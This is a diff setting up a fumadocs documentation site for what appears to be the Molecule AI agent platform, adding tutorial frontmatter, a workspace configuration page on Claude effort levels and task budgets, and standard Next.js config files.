+3. **Reactive (A2A Proxy):** On connection error to a workspace, checks `provisioner.IsRunning()` and triggers immediate offline + restart
+
+If none of these are catching a dead container, check `GET /admin/liveness` to verify the health sweep and liveness monitor subsystems are running.
--- a/content/docs/tutorials/fly-machines-provisioner.md
+++ b/content/docs/tutorials/fly-machines-provisioner.md
@ -1,3 +1,6 @@
+---
+title: "Provisioning Workspaces on Fly Machines (CONTAINER_BACKEND=flyio)"
+---
 # Provisioning Workspaces on Fly Machines (CONTAINER_BACKEND=flyio)

 Molecule AI can provision agent workspaces on [Fly Machines](https://fly.io/docs/machines/) instead of local Docker containers. When `CONTAINER_BACKEND=flyio` is set, every `POST /workspaces` creates a Fly Machine and boots the workspace agent inside it — with tier-based resource limits, env-var injection, and A2A registration handled automatically. The platform manages the workspace (lifecycle, auth, routing); Fly manages the machine it runs on.
--- a/content/docs/tutorials/gemini-cli-runtime.md
+++ b/content/docs/tutorials/gemini-cli-runtime.md
@ -1,3 +1,6 @@
+---
+title: "Running a Gemini CLI Workspace on Molecule AI"
+---
 # Running a Gemini CLI Workspace on Molecule AI

 Molecule AI now ships a `gemini-cli` runtime adapter alongside the existing `claude-code` adapter. This tutorial walks you from zero to a running Gemini agent workspace in under five minutes.
--- a/content/docs/tutorials/google-adk-runtime.md
+++ b/content/docs/tutorials/google-adk-runtime.md
@ -1,3 +1,6 @@
+---
+title: "Running a Google ADK Workspace on Molecule AI"
+---
 # Running a Google ADK Workspace on Molecule AI

 Google's Agent Development Kit (ADK) is now a first-class runtime on Molecule AI. This tutorial walks you from zero to a running ADK agent workspace — one that persists per-conversation session state and sits alongside your Claude Code and Gemini CLI workers in the same A2A network.
--- a/content/docs/tutorials/hermes-multi-provider-dispatch.md
+++ b/content/docs/tutorials/hermes-multi-provider-dispatch.md
@ -1,3 +1,6 @@
+---
+title: "Hermes Multi-Provider Dispatch: Native Anthropic, Gemini, and Multi-Turn History"
+---
 # Hermes Multi-Provider Dispatch: Native Anthropic, Gemini, and Multi-Turn History

 Hermes is Molecule AI's inference router. Out of the box it proxies every model through an OpenAI-compatible shim. That works for plain text, but the shim does format translation on every round-trip — and it gets the Gemini message format wrong (Gemini expects `role: "model"` and a `parts: [{text}]` wrapper; the shim passes `role: "assistant"` and a flat string). It also flattens multi-turn conversations into a single user blob, losing role attribution across turns.
--- a/content/docs/tutorials/lark-feishu-channel.md
+++ b/content/docs/tutorials/lark-feishu-channel.md
@ -1,3 +1,6 @@
+---
+title: "Connecting an AI Agent to Lark / Feishu"
+---
 # Connecting an AI Agent to Lark / Feishu

 Molecule AI's Lark channel adapter (shipped in #480) lets any workspace agent
--- a/content/docs/tutorials/register-remote-agent.md
+++ b/content/docs/tutorials/register-remote-agent.md
@ -1,3 +1,6 @@
+---
+title: "Register a Remote Agent on Molecule AI"
+---
 # Register a Remote Agent on Molecule AI

 Remote agents let you connect AI agents running on *any* infrastructure — your laptop, a cloud VM, a CI/CD pipeline, or an on-premise server — to a single Molecule AI canvas. Your agent keeps running wherever it lives; the canvas gives you fleet-wide visibility, secret management, and cross-network A2A messaging from one place.
--- a/content/docs/workspace-config.mdx
+++ b/content/docs/workspace-config.mdx
@ -0,0 +1,166 @@
+---
+title: Workspace Configuration
+description: Configure workspaces via config.yaml — runtime, model, tier, and Claude-specific settings including effort levels and task budget for Claude Opus 4.7.
+---
+
+import { Callout } from 'fumadocs-ui/components/callout';
+
+# Workspace Configuration
+
+Every Molecule AI workspace is backed by a `config.yaml` file. The **Config tab** in the canvas lets you edit this file through a structured form or in raw YAML mode. Changes take effect on the next workspace restart.
+
+---
+
+## Opening the Config tab
+
+1. Click any workspace node on the canvas to open its sidebar
+2. Select the **Config** tab
+3. Edit fields in the form view, or toggle **Raw YAML** in the top-right to edit `config.yaml` directly
+4. Click **Save** to write the file, or **Save & Restart** to apply changes immediately
+
+---
+
+## Claude Settings
+
+The **Claude Settings** section of the Config tab exposes two primitives from the Claude Opus 4.7 API: **effort level** and **task budget**. These control how much reasoning work Claude does per turn — trading cost and latency for output quality.
+
+<Callout type="info">
+  **Availability:** Claude Settings are only shown for workspaces running `runtime: claude-code` or using a model whose name includes `claude` or `anthropic`. The section is hidden for other runtimes and models.
+</Callout>
+
+The section is collapsed by default. Click **Claude Settings** to expand it.
+
+---
+
+## Effort levels
+
+The **Effort** dropdown sets `output_config.effort` on the Claude Messages API call for every turn in this workspace.
+
+| Value | Label | What it does | When to use |
+|---|---|---|---|
+| *(unset)* | — model default — | No `effort` field sent; Claude uses its built-in default | Everyday tasks where you want Claude to decide |
+| `low` | low | Minimal reasoning steps; fastest response, lowest cost | Quick lookups, simple rewrites, high-throughput pipelines where latency matters |
+| `medium` | medium | Balanced reasoning; Claude's typical quality for most tasks | General coding, writing, Q&A — a good starting point |
+| `high` | high | More deliberate reasoning; higher quality, higher cost | Code review, architecture decisions, nuanced analysis |
+| `xhigh` | xhigh (extended thinking) | **Activates extended thinking.** Claude works through the problem step-by-step before producing a final answer | Complex multi-step problems, hard debugging, long-range planning |
+| `max` | max — absolute ceiling | Maximum possible effort; extended thinking at full depth | Research-grade reasoning, competitive benchmarks, correctness-critical tasks where cost is not a constraint |
+
+### Tradeoffs
+
+Higher effort levels improve output quality at the cost of latency and token spend:
+
+- **Cost** scales roughly with reasoning depth. `max` can produce significantly more tokens than `low` on the same prompt.
+- **Latency** increases with effort because Claude takes more reasoning steps before responding.
+- **Quality** gains are most pronounced on tasks that require multi-step planning or where incorrect reasoning compounds (code generation, analysis, math).
+
+For most workspaces, leaving effort **unset** or at **medium** is the right default. Move to `high` or above for specialist worker agents that handle tasks where errors are expensive — a security auditor, an architect, a final reviewer.
+
+<Callout type="warn">
+  `xhigh` and `max` activate **extended thinking**, which is only available on **Claude Opus 4.7** and later. Using these levels with earlier models or other providers will return an API error.
+</Callout>
+
+---
+
+## Task budget
+
+The **Task Budget** field sets a token ceiling on how much thinking work Claude is allowed to do per turn. It maps to `output_config.task_budget.total` in the Messages API.
+
+| Field | Type | Default | Minimum |
+|---|---|---|---|
+| `task_budget` | integer (tokens) | 0 (unset) | 20,000 when set |
+
+**0 means unset** — no `task_budget` field is sent and Claude uses its own internal limit.
+
+When set to a non-zero value, Claude will not exceed that many tokens of thinking/reasoning per turn. This lets you cap spend on a per-workspace basis without changing the effort level.
+
+### When task budget applies
+
+Task budget only has an effect when:
+
+1. The workspace is running `runtime: claude-code` or a `claude`/`anthropic` model
+2. The beta header `task-budgets-2026-03-13` is enabled (see [Beta header](#beta-header-requirement) below)
+3. The effort level is `xhigh` or `max` (extended thinking must be active for the budget to be exercised)
+
+Setting a `task_budget` on a `low`/`medium`/`high` effort workspace is harmless — it will be sent but has no practical effect without extended thinking active.
+
+### Guidance
+
+- **20,000 tokens** is the beta minimum. Values below this are ignored by the API.
+- **50,000–100,000 tokens** covers most complex coding and analysis tasks.
+- **200,000+ tokens** is appropriate for research-grade or competitive-benchmark workloads.
+- A tighter budget reduces cost on `xhigh`/`max` workspaces but may truncate reasoning on very hard problems. Watch your workspace metrics and adjust if you see quality regressions.
+
+<Callout type="info">
+  **Executor wiring — coming in the next release.** The Config tab writes `effort` and `task_budget` to `config.yaml` today (PRs #639 and #654). The workspace executor that reads these values and passes them to the Claude SDK is tracked on the workspace-template side and will ship in the next release. Until that lands, the config is stored and visible but does not yet affect inference.
+</Callout>
+
+---
+
+## config.yaml reference
+
+Both fields serialize as top-level keys in `config.yaml`:
+
+```yaml title="config.yaml — effort + task_budget examples"
+name: Senior Reviewer
+runtime: claude-code
+model: anthropic:claude-opus-4-7
+role: |
+  You are a senior engineer performing code review. Be thorough.
+tier: 3
+
+# Claude Settings
+effort: high
+task_budget: 0          # 0 = unset; omitted from API call
+```
+
+```yaml title="config.yaml — extended thinking at a fixed budget"
+name: Architect
+runtime: claude-code
+model: anthropic:claude-opus-4-7
+role: |
+  You design systems. Think deeply before recommending an architecture.
+tier: 3
+
+effort: xhigh
+task_budget: 80000      # cap thinking at 80k tokens per turn
+```
+
+```yaml title="config.yaml — max effort, no budget cap"
+name: Research Agent
+runtime: claude-code
+model: anthropic:claude-opus-4-7
+role: |
+  You conduct research. Quality is the only constraint.
+tier: 4
+
+effort: max
+# task_budget omitted — no ceiling on reasoning depth
+```
+
+When `task_budget` is `0`, `toYaml()` omits it from the file entirely — the field only appears in `config.yaml` when it holds a positive value.
+
+---
+
+## Beta header requirement
+
+The `task_budget` feature requires the Anthropic API beta header:
+
+```
+anthropic-beta: task-budgets-2026-03-13
+```
+
+This header is added automatically by the workspace executor when `task_budget > 0` is present in `config.yaml`. You do not need to set it manually in your workspace config — it is an implementation detail of the executor, not a user-configurable option.
+
+<Callout type="warn">
+  If you call the Anthropic Messages API directly (outside of a Molecule AI workspace), you must include `anthropic-beta: task-budgets-2026-03-13` in your request headers for `output_config.task_budget` to take effect. Omitting it causes the parameter to be silently ignored.
+</Callout>
+
+---
+
+## See also
+
+- [Concepts — Workspaces](/docs/concepts#workspaces) — workspace primitives overview
+- [Org Template](/docs/org-template) — deploy effort/task_budget settings across an entire team via `org.yaml`
+- [Observability](/docs/observability) — monitor token usage per workspace to tune your budget settings
+- [API Reference — POST /workspaces](/docs/api-reference#post-workspaces)
+- [Claude Opus 4.7 — Anthropic docs](https://docs.anthropic.com) — upstream reference for `output_config`
--- a/lib/source.ts
+++ b/lib/source.ts
@ -0,0 +1,7 @@
+import { docs } from '@/.source/server';
+import { loader } from 'fumadocs-core/source';
+
+export const source = loader({
+  baseUrl: '/docs',
+  source: docs.toFumadocsSource(),
+});
--- a/mdx-components.tsx
+++ b/mdx-components.tsx
@ -0,0 +1,9 @@
+import defaultMdxComponents from 'fumadocs-ui/mdx';
+import type { MDXComponents } from 'mdx/types';
+
+export function getMDXComponents(components?: MDXComponents): MDXComponents {
+  return {
+    ...defaultMdxComponents,
+    ...components,
+  };
+}
--- a/next.config.mjs
+++ b/next.config.mjs
@ -0,0 +1,10 @@
+import { createMDX } from 'fumadocs-mdx/next';
+
+const withMDX = createMDX();
+
+/** @type {import('next').NextConfig} */
+const config = {
+  reactStrictMode: true,
+};
+
+export default withMDX(config);
--- a/package-lock.json
+++ b/package-lock.json
--- a/package.json
+++ b/package.json
@ -0,0 +1,31 @@
+{
+  "name": "molecule-docs",
+  "version": "0.1.0",
+  "private": true,
+  "description": "Molecule AI documentation site — doc.moleculesai.app",
+  "scripts": {
+    "build": "next build",
+    "dev": "next dev",
+    "start": "next start",
+    "postinstall": "fumadocs-mdx",
+    "lint": "next lint"
+  },
+  "dependencies": {
+    "fumadocs-core": "^16.7.16",
+    "fumadocs-mdx": "^14.3.0",
+    "fumadocs-ui": "^16.7.16",
+    "next": "^16.2.4",
+    "react": "^19.2.5",
+    "react-dom": "^19.2.5"
+  },
+  "devDependencies": {
+    "@tailwindcss/postcss": "^4.2.2",
+    "@types/mdx": "^2.0.13",
+    "@types/node": "^22.0.0",
+    "@types/react": "^19.2.14",
+    "@types/react-dom": "^19.2.3",
+    "postcss": "^8.5.10",
+    "tailwindcss": "^4.2.2",
+    "typescript": "^5.6.3"
+  }
+}
--- a/postcss.config.mjs
+++ b/postcss.config.mjs
@ -0,0 +1,5 @@
+export default {
+  plugins: {
+    '@tailwindcss/postcss': {},
+  },
+};
--- a/source.config.ts
+++ b/source.config.ts
@ -0,0 +1,11 @@
+import { defineConfig, defineDocs } from 'fumadocs-mdx/config';
+
+export const docs = defineDocs({
+  dir: 'content/docs',
+});
+
+export default defineConfig({
+  mdxOptions: {
+    // Add remark/rehype plugins here as needed.
+  },
+});
--- a/tsconfig.json
+++ b/tsconfig.json
@ -0,0 +1,41 @@
+{
+  "compilerOptions": {
+    "target": "ES2022",
+    "lib": [
+      "dom",
+      "dom.iterable",
+      "esnext"
+    ],
+    "allowJs": true,
+    "skipLibCheck": true,
+    "strict": true,
+    "noEmit": true,
+    "esModuleInterop": true,
+    "module": "esnext",
+    "moduleResolution": "Bundler",
+    "resolveJsonModule": true,
+    "isolatedModules": true,
+    "jsx": "react-jsx",
+    "incremental": true,
+    "plugins": [
+      {
+        "name": "next"
+      }
+    ],
+    "paths": {
+      "@/*": [
+        "./*"
+      ]
+    }
+  },
+  "include": [
+    "next-env.d.ts",
+    "**/*.ts",
+    "**/*.tsx",
+    ".next/types/**/*.ts",
+    ".next/dev/types/**/*.ts"
+  ],
+  "exclude": [
+    "node_modules"
+  ]
+}